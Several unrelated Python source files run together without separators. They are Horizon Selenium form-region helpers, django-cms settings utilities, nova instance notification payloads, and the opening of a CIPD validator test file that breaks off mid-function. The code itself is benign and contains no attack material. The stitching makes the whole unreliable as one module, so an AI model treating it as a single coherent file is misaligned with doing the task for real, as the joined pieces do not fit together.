        after submit/cancel check that the modal and fade elements with
        those ids are absent.
        """
        with self.waits_disabled():  # the form is either modal or not, don't wait
            old_modal_id = self._get_element_id(*self._modal_locator)
            old_fade_id = self._get_element_id(*self._fade_locator)

        yield

        if not (old_modal_id and old_fade_id):
            return  # the form isn't modal, exit

        def predicate(_):
            new_modal_id = self._get_element_id(*self._modal_locator)
            new_fade_id = self._get_element_id(*self._fade_locator)
            return (old_modal_id != new_modal_id) and \
                (old_fade_id != new_fade_id)

        with self.waits_disabled():
            self._wait_until(predicate)


class FormRegion(BaseFormRegion):
    """Standard form."""

    _header_locator = (by.By.CSS_SELECTOR, 'div.modal-header > h3')
    _side_info_locator = (by.By.CSS_SELECTOR, 'div.right')
    _fields_locator = (by.By.CSS_SELECTOR, 'fieldset')

    # private methods
    def __init__(self, driver, conf, src_elem=None, field_mappings=None):
        super(FormRegion, self).__init__(driver, conf, src_elem)
        self.field_mappings = self._prepare_mappings(field_mappings)
        self.wait_till_spinner_disappears()
        self._init_form_fields()

    def _prepare_mappings(self, field_mappings):
        if isinstance(field_mappings, tuple):
            return {item: item for item in field_mappings}
        else:
            return field_mappings

    # protected methods
    def _init_form_fields(self):
        self.fields_src_elem = self._get_element(*self._fields_locator)
        fields = self._get_form_fields()
        for accessor_name, accessor_expr in self.field_mappings.items():
            if isinstance(accessor_expr, six.string_types):
                self._dynamic_properties[accessor_name] = fields[accessor_expr]
            else:  # it is a class
                self._dynamic_properties[accessor_name] = accessor_expr(
                    self.driver, self.conf)

    def _get_form_fields(self):
        factory = FieldFactory(self.driver, self.conf, self.fields_src_elem)
        try:
            self._turn_off_implicit_wait()
            return {field.name: field for field in factory.fields()}
        finally:
            self._turn_on_implicit_wait()

    def set_field_values(self, data):
        """Set fields values.

        data - {field_name: field_value, field_name: field_value ...}
        """
        for field_name in data:
            field = getattr(self, field_name, None)
            # the form field does not exist
            if field is None:
                raise AttributeError("Unknown form field name.")
            value = data[field_name]
            # if None, the default value is left in the field
            if value is not None:
                # all text fields
                if hasattr(field, "text"):
                    field.text = value
                # file upload field
                elif hasattr(field, "path"):
                    field.path = value
                # integer fields
                elif hasattr(field, "value"):
                    field.value = value

    # properties
    @property
    def header(self):
        """Form header."""
        return self._get_element(*self._header_locator)

    @property
    def sideinfo(self):
        """Right part of the form, usually contains a description."""
        return self._get_element(*self._side_info_locator)

    @property
    def fields(self):
        """List of all fields that the form contains."""
        return self._get_form_fields()


class TabbedFormRegion(FormRegion):
    """Forms that are divided with tabs.

    A typical example is the Create Network form under
    Project/Network/Networks. On initialization the form needs its field
    names divided into tuples that represent the tabs and the fields
    located under them.
Usage: form_field_names = (("network_name", "admin_state"), ("create_subnet", "subnet_name", "network_address", "ip_version", "gateway_ip", "disable_gateway"), ("enable_dhcp", "allocation_pools", "dns_name_servers", "host_routes")) form = TabbedFormRegion(self.conf, self.driver, None, form_field_names) form.network_name.text = "test_network_name" """ _submit_locator = (by.By.CSS_SELECTOR, '*.btn.btn-primary[type=submit]') _side_info_locator = (by.By.CSS_SELECTOR, "td.help_text") def __init__(self, driver, conf, field_mappings=None, default_tab=0): self.current_tab = default_tab super(TabbedFormRegion, self).__init__( driver, conf, field_mappings=field_mappings) def _prepare_mappings(self, field_mappings): return [super(TabbedFormRegion, self)._prepare_mappings(tab_mappings) for tab_mappings in field_mappings] def _init_form_fields(self): self.switch_to(self.current_tab) def _init_tab_fields(self, tab_index): fieldsets = self._get_elements(*self._fields_locator) self.fields_src_elem = fieldsets[tab_index] fields = self._get_form_fields() current_tab_mappings = self.field_mappings[tab_index] for accessor_name, accessor_expr in current_tab_mappings.items(): if isinstance(accessor_expr, six.string_types): self._dynamic_properties[accessor_name] = fields[accessor_expr] else: # it is a class self._dynamic_properties[accessor_name] = accessor_expr( self.driver, self.conf, self.fields_src_elem) def switch_to(self, tab_index=0): self.tabs.switch_to(index=tab_index) self._init_tab_fields(tab_index) @property def tabs(self): return menus.TabbedMenuRegion(self.driver, self.conf, src_elem=self.src_elem) class TabbedFormRegionNG(TabbedFormRegion): """Forms that are divided with vertical tabs. These forms are implemented in angular-js and have transfer-tables as usual field's element. """ _submit_locator = (by.By.CSS_SELECTOR, 'button.btn.btn-primary.finish') _header_locator = (by.By.CSS_SELECTOR, '.modal-header > .h4') _fields_locator = (by.By.CSS_SELECTOR, '.step ng-include[ng-form]') _cancel_locator = (by.By.CSS_SELECTOR, 'button.btn.btn-default.pull-left') @property def tabs(self): return menus.TabbedMenuRegionNG(self.driver, self.conf) class DateFormRegion(BaseFormRegion): """Form that queries data to table that is regularly below the form, typical example is located on Project/Compute/Overview page. 
""" _from_field_locator = (by.By.CSS_SELECTOR, 'input#id_start') _to_field_locator = (by.By.CSS_SELECTOR, 'input#id_end') @property def from_date(self): return self._get_element(*self._from_field_locator) @property def to_date(self): return self._get_element(*self._to_field_locator) def query(self, start, end): self._set_from_field(start) self._set_to_field(end) self.submit() def _set_from_field(self, value): self._fill_field_element(value, self.from_date) def _set_to_field(self, value): self._fill_field_element(value, self.to_date) class MetadataFormRegion(BaseFormRegion): _input_tmpl = ('//div[contains(@class, "input-group") and ' 'descendant::span[@title="{}"]]') _input_fields = (by.By.CSS_SELECTOR, 'div.input-group') _custom_input_field = (by.By.XPATH, "//input[@name='customItem']") _custom_input_button = (by.By.CSS_SELECTOR, 'span.input-group-btn > .btn') _submit_locator = (by.By.CSS_SELECTOR, '.modal-footer > .btn.btn-primary') _cancel_locator = (by.By.CSS_SELECTOR, '.modal-footer > .btn.btn-default') def _form_getter(self): return self.driver.find_element(*self._default_form_locator) @property def custom_field_value(self): return self._get_element(*self._custom_input_field) @property def add_button(self): return self._get_element(*self._custom_input_button) def add_custom_field(self, field_name, field_value): self.custom_field_value.send_keys(field_name) self.add_button.click() div = self._get_element(by.By.XPATH, self._input_tmpl.format(field_name)) field = div.find_element(by.By.CSS_SELECTOR, 'input') if not hasattr(self, field_name): self._dynamic_properties[field_name] = field self.set_field_value(field_name, field_value) def set_field_value(self, field_name, field_value): if hasattr(self, field_name): field = getattr(self, field_name) field.send_keys(field_value) else: raise AttributeError("Unknown form field '{}'.".format(field_name)) def get_existing_metadata(self): metadata = {} for div in self._get_elements(*self._input_fields): if div.text not in ('Custom',): field = div.find_element(by.By.CSS_SELECTOR, 'input') metadata[div.text] = field.get_attribute('value') return metadata class ItemTextDescription(baseregion.BaseRegion): _separator_locator = (by.By.CSS_SELECTOR, 'dl.dl-horizontal') _key_locator = (by.By.CSS_SELECTOR, 'dt') _value_locator = (by.By.CSS_SELECTOR, 'dd') def __init__(self, driver, conf, src=None): super(ItemTextDescription, self).__init__(driver, conf, src) def get_content(self): keys = [] values = [] for section in self._get_elements(*self._separator_locator): keys.extend([x.text for x in section.find_elements(*self._key_locator)]) values.extend([x.text for x in section.find_elements(*self._value_locator)]) return dict(zip(keys, values)) class ReadOnlyFormRegion(BaseFormRegion): """Form with read only fields. Typical example is located on Project/Compute/Access and Security/API Access page (View Credentials form). 
""" _labels_locator = (by.By.CSS_SELECTOR, '.left > fieldset label, ' '.right > fieldset label') _fields_locator = (by.By.CSS_SELECTOR, '.left > fieldset input, ' '.right > fieldset input') @property def get_form_labels(self): label_elements = self._get_elements(*self._labels_locator) labels = [label_element.text for label_element in label_elements] return labels @property def get_form_fields(self): field_elements = self._get_elements(*self._fields_locator) field_values = [field_element.get_attribute("value") for field_element in field_elements] labels = self.get_form_labels for item in range(len(labels)): self._dynamic_properties[labels[item]] = field_values[item] return self._dynamic_properties class MembershipFormRegion(BaseFormRegion): _available_locator = (by.By.CSS_SELECTOR, '.available_members > ul') _allocated_locator = (by.By.CSS_SELECTOR, '.members > ul') _name_sublocator = (by.By.CSS_SELECTOR, 'li.member > span.display_name') _add_remove_sublocator = (by.By.CSS_SELECTOR, 'li.active > a[href="#add_remove"]') def _get_item_name(self, element): return element.find_element(*self._name_sublocator).text @property def available_items(self): items = self._wait_until( lambda _: self._get_elements(*self._available_locator)) return {self._get_item_name(el): el for el in items} @property def allocated_items(self): return {self._get_item_name(el): el for el in self._get_elements(*self._allocated_locator)} def allocate_item(self, name): item = self.available_items[name] allocate_btn = item.find_element(*self._add_remove_sublocator) allocate_btn.click() def deallocate_item(self, name): item = self.allocated_items[name] deallocate_btn = item.find_element(*self._add_remove_sublocator) deallocate_btn.click()
# -*- coding: utf-8 -*-
from functools import update_wrapper
import os

from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.utils.translation import ugettext_lazy as _
from django.utils.six.moves.urllib.parse import urljoin

from cms import constants

__all__ = ['get_cms_setting']


class VERIFIED:
    pass  # need a unique identifier for CMS_LANGUAGES


def default(name):
    def decorator(wrapped):
        def wrapper():
            if hasattr(settings, name):
                return getattr(settings, name)
            return wrapped()
        update_wrapper(wrapper, wrapped)
        return wrapper
    return decorator


DEFAULTS = {
    'TEMPLATE_INHERITANCE': True,
    'TOOLBAR_SIMPLE_STRUCTURE_MODE': True,
    'PLACEHOLDER_CONF': {},
    'PERMISSION': False,
    # Whether to use raw ID lookups for users when PERMISSION is True
    'RAW_ID_USERS': False,
    'PUBLIC_FOR': 'all',
    'CONTENT_CACHE_DURATION': 60,
    'APPHOOKS': [],
    'TOOLBARS': [],
    'SITE_CHOICES_CACHE_KEY': 'CMS:site_choices',
    'PAGE_CHOICES_CACHE_KEY': 'CMS:page_choices',
    'MEDIA_PATH': 'cms/',
    'PAGE_MEDIA_PATH': 'cms_page_media/',
    'TITLE_CHARACTER': '+',
    'PAGE_CACHE': True,
    'PLACEHOLDER_CACHE': True,
    'PLUGIN_CACHE': True,
    'CACHE_PREFIX': 'cms-',
    'PLUGIN_PROCESSORS': [],
    'PLUGIN_CONTEXT_PROCESSORS': [],
    'UNIHANDECODE_VERSION': None,
    'UNIHANDECODE_DECODERS': ['ja', 'zh', 'kr', 'vn', 'diacritic'],
    'UNIHANDECODE_DEFAULT_DECODER': 'diacritic',
    'MAX_PAGE_PUBLISH_REVERSIONS': 10,
    'MAX_PAGE_HISTORY_REVERSIONS': 15,
    'TOOLBAR_ANONYMOUS_ON': True,
    'TOOLBAR_URL__EDIT_ON': 'edit',
    'TOOLBAR_URL__EDIT_OFF': 'edit_off',
    'TOOLBAR_URL__BUILD': 'build',
    'TOOLBAR_URL__DISABLE': 'toolbar_off',
    'ADMIN_NAMESPACE': 'admin',
    'APP_NAME': None,
    'TOOLBAR_HIDE': False,
}


def get_cache_durations():
    return {
        'menus': getattr(settings, 'MENU_CACHE_DURATION', 60 * 60),
        'content': get_cms_setting('CONTENT_CACHE_DURATION'),
        'permissions': 60 * 60,
    }


@default('CMS_MEDIA_ROOT')
def get_media_root():
    return os.path.join(settings.MEDIA_ROOT, get_cms_setting('MEDIA_PATH'))


@default('CMS_MEDIA_URL')
def get_media_url():
    return urljoin(settings.MEDIA_URL, get_cms_setting('MEDIA_PATH'))


@default('CMS_TOOLBAR_URL__EDIT_ON')
def get_toolbar_url__edit_on():
    return get_cms_setting('TOOLBAR_URL__EDIT_ON')


@default('CMS_TOOLBAR_URL__EDIT_OFF')
def get_toolbar_url__edit_off():
    return get_cms_setting('TOOLBAR_URL__EDIT_OFF')


@default('CMS_TOOLBAR_URL__BUILD')
def get_toolbar_url__build():
    return get_cms_setting('TOOLBAR_URL__BUILD')


@default('CMS_TOOLBAR_URL__DISABLE')
def get_toolbar_url__disable():
    return get_cms_setting('TOOLBAR_URL__DISABLE')


def get_templates():
    from cms.utils.django_load import load_from_file
    if getattr(settings, 'CMS_TEMPLATES_DIR', False):
        tpldir = getattr(settings, 'CMS_TEMPLATES_DIR', False)
        # CMS_TEMPLATES_DIR can either be a string pointing to the templates
        # directory or a dictionary holding 'site: template dir' entries
        if isinstance(tpldir, dict):
            tpldir = tpldir[settings.SITE_ID]
        # We must extract the relative path of CMS_TEMPLATES_DIR to the
        # nearest valid templates directory. Here we mimic what the
        # filesystem and app_directories template loaders do.
        prefix = ''
        # Relative to TEMPLATE_DIRS for the filesystem loader
        try:
            path = settings.TEMPLATE_DIRS
        except IndexError:
            path = [template['DIRS'][0] for template in settings.TEMPLATES]
        for basedir in path:
            if tpldir.find(basedir) == 0:
                prefix = tpldir.replace(basedir + os.sep, '')
                break
        # Relative to the 'templates' directory that app_directories scans
        if not prefix:
            components = tpldir.split(os.sep)
            try:
                prefix = os.path.join(
                    *components[components.index('templates') + 1:])
            except ValueError:
                # If 'templates' is not found we use the directory name as
                # prefix and hope for the best
                prefix = os.path.basename(tpldir)
        config_path = os.path.join(tpldir, '__init__.py')
        # Try to load the templates list and names from the template module.
        # If the module file is not present, skip configuration and just dump
        # the filenames as templates.
        if config_path:
            template_module = load_from_file(config_path)
            templates = [
                (os.path.join(prefix, data[0].strip()), data[1])
                for data in template_module.TEMPLATES.items()]
        else:
            templates = list(
                (os.path.join(prefix, tpl), tpl) for tpl in os.listdir(tpldir))
    else:
        templates = list(getattr(settings, 'CMS_TEMPLATES', []))
    if get_cms_setting('TEMPLATE_INHERITANCE'):
        templates.append(
            (constants.TEMPLATE_INHERITANCE_MAGIC,
             _(constants.TEMPLATE_INHERITANCE_LABEL)))
    return templates


def _ensure_languages_settings(languages):
    valid_language_keys = ['code', 'name', 'fallbacks', 'hide_untranslated',
                           'redirect_on_fallback', 'public']
    required_language_keys = ['code', 'name']
    simple_defaults = ['public', 'redirect_on_fallback', 'hide_untranslated']

    if not isinstance(languages, dict):
        raise ImproperlyConfigured(
            "CMS_LANGUAGES must be a dictionary with site IDs and 'default'"
            " as keys. Please check the format.")

    defaults = languages.pop('default', {})
    default_fallbacks = defaults.get('fallbacks')
    needs_fallbacks = []

    for key in defaults:
        if key not in valid_language_keys:
            raise ImproperlyConfigured(
                "CMS_LANGUAGES has an invalid property in the default"
                " properties: %s" % key)

    for key in simple_defaults:
        if key not in defaults:
            defaults[key] = True

    for site, language_list in languages.items():
        if site != hash(site):
            raise ImproperlyConfigured(
                "CMS_LANGUAGES can only be filled with integers (site IDs)"
                " and 'default' for default values. %s is not a valid key."
                % site)

        for language_object in language_list:
            for required_key in required_language_keys:
                if required_key not in language_object:
                    raise ImproperlyConfigured(
                        "CMS_LANGUAGES has a language which is missing the"
                        " required key %r in site %r" % (required_key, site))
            language_code = language_object['code']
            for key in language_object:
                if key not in valid_language_keys:
                    raise ImproperlyConfigured(
                        "CMS_LANGUAGES has invalid key %r in language %r in"
                        " site %r" % (key, language_code, site))

            if 'fallbacks' not in language_object:
                if default_fallbacks:
                    language_object['fallbacks'] = default_fallbacks
                else:
                    needs_fallbacks.append((site, language_object))
            for key in simple_defaults:
                if key not in language_object:
                    language_object[key] = defaults[key]

    site_fallbacks = {}
    for site, language_object in needs_fallbacks:
        if site not in site_fallbacks:
            site_fallbacks[site] = [
                lang['code'] for lang in languages[site] if lang['public']]
        language_object['fallbacks'] = [
            lang_code for lang_code in site_fallbacks[site]
            if lang_code != language_object['code']]

    languages['default'] = defaults
    # this will be busted by @override_settings and cause a re-check
    languages[VERIFIED] = True

    return languages


def get_languages():
    if settings.SITE_ID != hash(settings.SITE_ID):
        raise ImproperlyConfigured(
            "SITE_ID must be an integer"
        )
    if not settings.USE_I18N:
        return _ensure_languages_settings(
            {settings.SITE_ID: [{'code': settings.LANGUAGE_CODE,
                                 'name': settings.LANGUAGE_CODE}]})
    if settings.LANGUAGE_CODE not in dict(settings.LANGUAGES):
        raise ImproperlyConfigured(
            'LANGUAGE_CODE "%s" must have a matching entry in LANGUAGES'
            % settings.LANGUAGE_CODE
        )
    languages = getattr(settings, 'CMS_LANGUAGES', {
        settings.SITE_ID: [{'code': code, 'name': _(name)}
                           for code, name in settings.LANGUAGES]
    })
    if VERIFIED in languages:
        return languages
    return _ensure_languages_settings(languages)


def get_unihandecode_host():
    host = getattr(settings, 'CMS_UNIHANDECODE_HOST', None)
    if not host:
        return host
    if host.endswith('/'):
        return host
    else:
        return host + '/'


COMPLEX = {
    'CACHE_DURATIONS': get_cache_durations,
    'MEDIA_ROOT': get_media_root,
    'MEDIA_URL': get_media_url,
    # complex because not prefixed by CMS_
    'TEMPLATES': get_templates,
    'LANGUAGES': get_languages,
    'UNIHANDECODE_HOST': get_unihandecode_host,
    'CMS_TOOLBAR_URL__EDIT_ON': get_toolbar_url__edit_on,
    'CMS_TOOLBAR_URL__EDIT_OFF': get_toolbar_url__edit_off,
    'CMS_TOOLBAR_URL__BUILD': get_toolbar_url__build,
    'CMS_TOOLBAR_URL__DISABLE': get_toolbar_url__disable,
}


def get_cms_setting(name):
    if name in COMPLEX:
        return COMPLEX[name]()
    else:
        return getattr(settings, 'CMS_%s' % name, DEFAULTS[name])


def get_site_id(site):
    from django.contrib.sites.models import Site
    if isinstance(site, Site):
        return site.id
    try:
        return int(site)
    except (TypeError, ValueError):
        pass
    return settings.SITE_ID
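

# Editorial sketch, not part of this module: the helper below only illustrates
# the lookup order implemented by get_cms_setting(), assuming a configured
# Django settings module in which CMS_TEMPLATE_INHERITANCE is not set.
# COMPLEX entries are computed on every call; everything else is read from a
# CMS_-prefixed Django setting and falls back to DEFAULTS. The function name
# is invented for the example and is never called by the CMS itself.
def _demo_get_cms_setting_lookup_order():
    from django.test import override_settings

    # Simple setting: settings.CMS_TEMPLATE_INHERITANCE wins when present,
    # otherwise DEFAULTS['TEMPLATE_INHERITANCE'] is used.
    assert get_cms_setting('TEMPLATE_INHERITANCE') is True
    with override_settings(CMS_TEMPLATE_INHERITANCE=False):
        assert get_cms_setting('TEMPLATE_INHERITANCE') is False

    # Complex setting: always computed, here via get_cache_durations(), which
    # mixes a plain Django setting (MENU_CACHE_DURATION) with the CMS setting
    # CONTENT_CACHE_DURATION.
    assert get_cms_setting('CACHE_DURATIONS')['permissions'] == 60 * 60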
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from nova.notifications.objects import base from nova.objects import base as nova_base from nova.objects import fields @nova_base.NovaObjectRegistry.register_notification class InstancePayload(base.NotificationPayloadBase): SCHEMA = { 'uuid': ('instance', 'uuid'), 'user_id': ('instance', 'user_id'), 'tenant_id': ('instance', 'project_id'), 'reservation_id': ('instance', 'reservation_id'), 'display_name': ('instance', 'display_name'), 'display_description': ('instance', 'display_description'), 'host_name': ('instance', 'hostname'), 'host': ('instance', 'host'), 'node': ('instance', 'node'), 'os_type': ('instance', 'os_type'), 'architecture': ('instance', 'architecture'), 'availability_zone': ('instance', 'availability_zone'), 'image_uuid': ('instance', 'image_ref'), 'kernel_id': ('instance', 'kernel_id'), 'ramdisk_id': ('instance', 'ramdisk_id'), 'created_at': ('instance', 'created_at'), 'launched_at': ('instance', 'launched_at'), 'terminated_at': ('instance', 'terminated_at'), 'deleted_at': ('instance', 'deleted_at'), 'state': ('instance', 'vm_state'), 'power_state': ('instance', 'power_state'), 'task_state': ('instance', 'task_state'), 'progress': ('instance', 'progress'), 'metadata': ('instance', 'metadata'), 'locked': ('instance', 'locked'), } # Version 1.0: Initial version # Version 1.1: add locked and display_description field VERSION = '1.1' fields = { 'uuid': fields.UUIDField(), 'user_id': fields.StringField(nullable=True), 'tenant_id': fields.StringField(nullable=True), 'reservation_id': fields.StringField(nullable=True), 'display_name': fields.StringField(nullable=True), 'display_description': fields.StringField(nullable=True), 'host_name': fields.StringField(nullable=True), 'host': fields.StringField(nullable=True), 'node': fields.StringField(nullable=True), 'os_type': fields.StringField(nullable=True), 'architecture': fields.StringField(nullable=True), 'availability_zone': fields.StringField(nullable=True), 'flavor': fields.ObjectField('FlavorPayload'), 'image_uuid': fields.StringField(nullable=True), 'kernel_id': fields.StringField(nullable=True), 'ramdisk_id': fields.StringField(nullable=True), 'created_at': fields.DateTimeField(nullable=True), 'launched_at': fields.DateTimeField(nullable=True), 'terminated_at': fields.DateTimeField(nullable=True), 'deleted_at': fields.DateTimeField(nullable=True), 'state': fields.InstanceStateField(nullable=True), 'power_state': fields.InstancePowerStateField(nullable=True), 'task_state': fields.InstanceTaskStateField(nullable=True), 'progress': fields.IntegerField(nullable=True), 'ip_addresses': fields.ListOfObjectsField('IpPayload'), 'metadata': fields.DictOfStringsField(), 'locked': fields.BooleanField(), } def __init__(self, instance, **kwargs): super(InstancePayload, self).__init__(**kwargs) self.populate_schema(instance=instance) @nova_base.NovaObjectRegistry.register_notification class InstanceActionPayload(InstancePayload): # No SCHEMA as all the additional fields are calculated # Version 1.1: locked and 
display_description added to InstancePayload VERSION = '1.1' fields = { 'fault': fields.ObjectField('ExceptionPayload', nullable=True), } def __init__(self, instance, fault, ip_addresses, flavor, **kwargs): super(InstanceActionPayload, self).__init__( instance=instance, fault=fault, ip_addresses=ip_addresses, flavor=flavor, **kwargs) @nova_base.NovaObjectRegistry.register_notification class InstanceActionVolumeSwapPayload(InstanceActionPayload): # No SCHEMA as all the additional fields are calculated # Version 1.1: locked and display_description added to InstancePayload VERSION = '1.1' fields = { 'old_volume_id': fields.UUIDField(), 'new_volume_id': fields.UUIDField(), } def __init__(self, instance, fault, ip_addresses, flavor, old_volume_id, new_volume_id): super(InstanceActionVolumeSwapPayload, self).__init__( instance=instance, fault=fault, ip_addresses=ip_addresses, flavor=flavor, old_volume_id=old_volume_id, new_volume_id=new_volume_id) @nova_base.NovaObjectRegistry.register_notification class InstanceUpdatePayload(InstancePayload): # Version 1.0: Initial version # Version 1.1: locked and display_description added to InstancePayload VERSION = '1.1' fields = { 'state_update': fields.ObjectField('InstanceStateUpdatePayload'), 'audit_period': fields.ObjectField('AuditPeriodPayload'), 'bandwidth': fields.ListOfObjectsField('BandwidthPayload'), 'old_display_name': fields.StringField(nullable=True) } def __init__(self, instance, flavor, ip_addresses, state_update, audit_period, bandwidth, old_display_name): super(InstanceUpdatePayload, self).__init__( instance=instance, flavor=flavor, ip_addresses=ip_addresses, state_update=state_update, audit_period=audit_period, bandwidth=bandwidth, old_display_name=old_display_name) @nova_base.NovaObjectRegistry.register_notification class IpPayload(base.NotificationPayloadBase): # Version 1.0: Initial version VERSION = '1.0' fields = { 'label': fields.StringField(), 'mac': fields.MACAddressField(), 'meta': fields.DictOfStringsField(), 'port_uuid': fields.UUIDField(nullable=True), 'version': fields.IntegerField(), 'address': fields.IPV4AndV6AddressField(), 'device_name': fields.StringField(nullable=True) } @classmethod def from_network_info(cls, network_info): """Returns a list of IpPayload object based on the passed network_info. 
""" ips = [] if network_info is not None: for vif in network_info: for ip in vif.fixed_ips(): ips.append(cls( label=vif["network"]["label"], mac=vif["address"], meta=vif["meta"], port_uuid=vif["id"], version=ip["version"], address=ip["address"], device_name=vif["devname"])) return ips @nova_base.NovaObjectRegistry.register_notification class BandwidthPayload(base.NotificationPayloadBase): # Version 1.0: Initial version VERSION = '1.0' fields = { 'network_name': fields.StringField(), 'in_bytes': fields.IntegerField(), 'out_bytes': fields.IntegerField(), } @nova_base.NovaObjectRegistry.register_notification class AuditPeriodPayload(base.NotificationPayloadBase): # Version 1.0: Initial version VERSION = '1.0' fields = { 'audit_period_beginning': fields.DateTimeField(), 'audit_period_ending': fields.DateTimeField(), } @nova_base.NovaObjectRegistry.register_notification class InstanceStateUpdatePayload(base.NotificationPayloadBase): # Version 1.0: Initial version VERSION = '1.0' fields = { 'old_state': fields.StringField(nullable=True), 'state': fields.StringField(nullable=True), 'old_task_state': fields.StringField(nullable=True), 'new_task_state': fields.StringField(nullable=True), } @base.notification_sample('instance-delete-start.json') @base.notification_sample('instance-delete-end.json') @base.notification_sample('instance-pause-start.json') @base.notification_sample('instance-pause-end.json') @base.notification_sample('instance-unpause-start.json') @base.notification_sample('instance-unpause-end.json') @base.notification_sample('instance-resize-start.json') @base.notification_sample('instance-resize-end.json') @base.notification_sample('instance-suspend-start.json') @base.notification_sample('instance-suspend-end.json') @base.notification_sample('instance-power_on-start.json') @base.notification_sample('instance-power_on-end.json') @base.notification_sample('instance-power_off-start.json') @base.notification_sample('instance-power_off-end.json') # @base.notification_sample('instance-reboot-start.json') # @base.notification_sample('instance-reboot-end.json') @base.notification_sample('instance-shutdown-start.json') @base.notification_sample('instance-shutdown-end.json') @base.notification_sample('instance-snapshot-start.json') @base.notification_sample('instance-snapshot-end.json') # @base.notification_sample('instance-add_fixed_ip-start.json') # @base.notification_sample('instance-add_fixed_ip-end.json') @base.notification_sample('instance-shelve-start.json') @base.notification_sample('instance-shelve-end.json') @base.notification_sample('instance-resume-start.json') @base.notification_sample('instance-resume-end.json') @base.notification_sample('instance-restore-start.json') @base.notification_sample('instance-restore-end.json') # @base.notification_sample('instance-evacuate.json') @base.notification_sample('instance-resize_finish-start.json') @base.notification_sample('instance-resize_finish-end.json') # @base.notification_sample('instance-live_migration_pre-start.json') # @base.notification_sample('instance-live_migration_pre-end.json') # @base.notification_sample('instance-live_migration_abort-start.json') # @base.notification_sample('instance-live_migration_abort-end.json') # @base.notification_sample('instance-live_migration_post-start.json') # @base.notification_sample('instance-live_migration_post-end.json') # @base.notification_sample('instance-live_migration_post_dest-start.json') # @base.notification_sample('instance-live_migration_post_dest-end.json') # 
@base.notification_sample('instance-live_migration_rollback-start.json') # @base.notification_sample('instance-live_migration_rollback-end.json') # @base.notification_sample('instance-live_migration_rollback_dest-start.json') # @base.notification_sample('instance-live_migration_rollback_dest-end.json') # @base.notification_sample('instance-rebuild-error.json') # @base.notification_sample('instance-remove_fixed_ip-start.json') # @base.notification_sample('instance-remove_fixed_ip-end.json') # @base.notification_sample('instance-resize_confirm-start.json') # @base.notification_sample('instance-resize_confirm-end.json') # @base.notification_sample('instance-resize_prep-start.json') # @base.notification_sample('instance-resize_revert-start.json') # @base.notification_sample('instance-resize_revert-end.json') @base.notification_sample('instance-shelve_offload-start.json') @base.notification_sample('instance-shelve_offload-end.json') # @base.notification_sample('instance-soft_delete-start.json') # @base.notification_sample('instance-soft_delete-end.json') # @base.notification_sample('instance-trigger_crash_dump-start.json') # @base.notification_sample('instance-trigger_crash_dump-end.json') # @base.notification_sample('instance-unrescue-start.json') # @base.notification_sample('instance-unrescue-end.json') @base.notification_sample('instance-unshelve-start.json') @base.notification_sample('instance-unshelve-end.json') @base.notification_sample('instance-create-start.json') @base.notification_sample('instance-create-end.json') @nova_base.NovaObjectRegistry.register_notification class InstanceActionNotification(base.NotificationBase): # Version 1.0: Initial version VERSION = '1.0' fields = { 'payload': fields.ObjectField('InstanceActionPayload') } @base.notification_sample('instance-update.json') @nova_base.NovaObjectRegistry.register_notification class InstanceUpdateNotification(base.NotificationBase): # Version 1.0: Initial version VERSION = '1.0' fields = { 'payload': fields.ObjectField('InstanceUpdatePayload') } @base.notification_sample('instance-volume_swap-start.json') @base.notification_sample('instance-volume_swap-end.json') @base.notification_sample('instance-volume_swap-error.json') @nova_base.NovaObjectRegistry.register_notification class InstanceActionVolumeSwapNotification(base.NotificationBase): # Version 1.0: Initial version VERSION = '1.0' fields = { 'payload': fields.ObjectField('InstanceActionVolumeSwapPayload') }
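

# Editorial sketch, not nova code: a stripped-down illustration of the SCHEMA
# pattern used by the payloads above. Each payload field names the source
# object and the attribute it is populated from, so extending a payload means
# adding a SCHEMA entry plus a field definition and bumping VERSION. The
# ToySchemaPayload and _FakeInstance names below are invented for the example.
class ToySchemaPayload(object):
    SCHEMA = {
        'uuid': ('instance', 'uuid'),
        'host_name': ('instance', 'hostname'),
    }

    def __init__(self, **source_objects):
        # Conceptually what populate_schema() does: copy each mapped
        # attribute from the named source object onto the payload.
        for payload_field, (obj_name, obj_attr) in self.SCHEMA.items():
            setattr(self, payload_field,
                    getattr(source_objects[obj_name], obj_attr))


def _demo_toy_schema_payload():
    class _FakeInstance(object):
        uuid = '11111111-2222-3333-4444-555555555555'
        hostname = 'vm-1'

    payload = ToySchemaPayload(instance=_FakeInstance())
    assert payload.uuid == _FakeInstance.uuid
    assert payload.host_name == 'vm-1'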
# Copyright 2014 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. import datetime import hashlib import StringIO import unittest import zipfile from google.appengine.ext import ndb from testing_utils import testing from components import auth from components import utils from cas import impl as cas_impl from cipd import impl from cipd import processing class TestValidators(unittest.TestCase): def test_is_valid_package_name(self): self.assertTrue(impl.is_valid_package_name('a')) self.assertTrue(impl.is_valid_package_name('a/b')) self.assertTrue(impl.is_valid_package_name('a/b/c/1/2/3')) self.assertTrue(impl.is_valid_package_name('infra/tools/cipd')) self.assertTrue(impl.is_valid_package_name('-/_')) self.assertFalse(impl.is_valid_package_name('')) self.assertFalse(impl.is_valid_package_name('/a')) self.assertFalse(impl.is_valid_package_name('a/')) self.assertFalse(impl.is_valid_package_name('A')) self.assertFalse(impl.is_valid_package_name('a/B')) self.assertFalse(impl.is_valid_package_name('a\\b')) def test_is_valid_package_path(self): self.assertTrue(impl.is_valid_package_path('a')) self.assertTrue(impl.is_valid_package_path('a/b')) self.assertTrue(impl.is_valid_package_path('a/b/c/1/2/3')) self.assertTrue(impl.is_valid_package_path('infra/tools/cipd')) self.assertTrue(impl.is_valid_package_path('-/_')) self.assertFalse(impl.is_valid_package_path('')) self.assertFalse(impl.is_valid_package_path('/a')) self.assertFalse(impl.is_valid_package_path('a/')) self.assertFalse(impl.is_valid_package_path('A')) self.assertFalse(impl.is_valid_package_path('a/B')) self.assertFalse(impl.is_valid_package_path('a\\b')) def test_is_valid_instance_id(self): self.assertTrue(impl.is_valid_instance_id('a'*40)) self.assertFalse(impl.is_valid_instance_id('')) self.assertFalse(impl.is_valid_instance_id('A'*40)) def test_is_valid_package_ref(self): 